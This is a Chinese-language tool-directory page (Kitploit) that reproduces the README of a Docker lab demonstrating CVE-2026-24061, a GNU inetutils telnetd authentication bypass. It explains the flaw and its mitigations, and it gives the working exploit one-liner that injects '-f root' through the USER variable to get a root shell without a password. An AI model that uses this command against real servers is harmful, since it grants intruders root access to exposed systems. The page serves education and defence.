Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
容器安全漏洞分析漏洞利用渗透测试学习与教育实验室与实践
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

这是一个简单的 PoC,可让您凸显当前正在发生并被积极利用的 Telnet 漏洞的严重性。为什么人们还在使用 Telnet……我无法理解。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16个月前尚未审核

CVE-2026-24061:GNU inetutils-telnetd 身份验证绕过

一个用于演示 CVE-2026-24061 的 Docker 实验环境——这是 GNU inetutils telnetd 中的一个严重身份验证绕过漏洞,该漏洞在 11 年 内未得到修补。

漏洞详情

Telnetd 将 USER 环境变量直接传递给 /usr/bin/login,未进行任何清理。login 二进制文件有一个 -f 标志,用于跳过身份验证(专为已预认证的会话设计)。通过设置 USER='-f root',攻击者可以诱骗 login 在无需密码的情况下授予 root 访问权限。

受影响版本: GNU inetutils 1.9.3(2015 年 3 月)至 2.7 CVSS 评分: 9.8(严重) 修复方案: 升级至 inetutils 2.8+

快速开始

root@kitploit:~
# 构建镜像
docker build -t telnetd-exploit .

# 运行容器(以 user1 身份进入 shell)
docker run --rm -it telnetd-exploit

# 漏洞利用——无需密码获取 root 权限
USER='-f root' telnet -a localhost

你将进入一个 root shell。运行 whoami 进行确认。

工作原理

root@kitploit:~
1. 客户端连接时使用:USER='-f root' telnet -a localhost
2. telnetd 接收 USER 环境变量:"-f root"
3. telnetd 执行:/usr/bin/login -f root
4. login 将 -f 解释为"跳过身份验证,用户已预先验证"
5. 攻击者获得 root shell——无需密码

为什么存在 -f 标志

-f 标志是合法的——它用于用户已经过身份验证的场景(例如,来自受信任的本地会话)。问题在于 telnetd 在将 USER 变量传递给 login 之前未对其进行清理,从而允许远程攻击者注入该标志。

影响范围

截至 2026 年 1 月:

  • 全球约 80 万 台 Telnet 服务器暴露(Shadowserver)
  • Shodan 上索引约 29 万 台
  • 该漏洞已在野外被积极利用(CISA KEV 目录)

为什么你不应该使用 Telnet

即使没有这个漏洞,Telnet 也会以明文传输所有内容——包括密码。请改用 SSH。

协议加密身份验证
Telnet无明文
SSH有密钥/密码

文件结构

root@kitploit:~
.
├── Dockerfile              # 构建存在漏洞的 Debian 容器
├── docker-entrypoint.sh    # 启动 inetd,降权至 user1
└── README.md

缓解措施

  1. 升级 至 GNU inetutils 2.8+
  2. 禁用 telnetd——封锁端口 23
  3. 使用 SSH——现在是 2026 年了

参考资料

  • CVE-2026-24061
  • 原始公告
  • CISA KEV 条目

致谢

实验环境基于 leonjza/inetutils-telnetd-auth-bypass

下载工具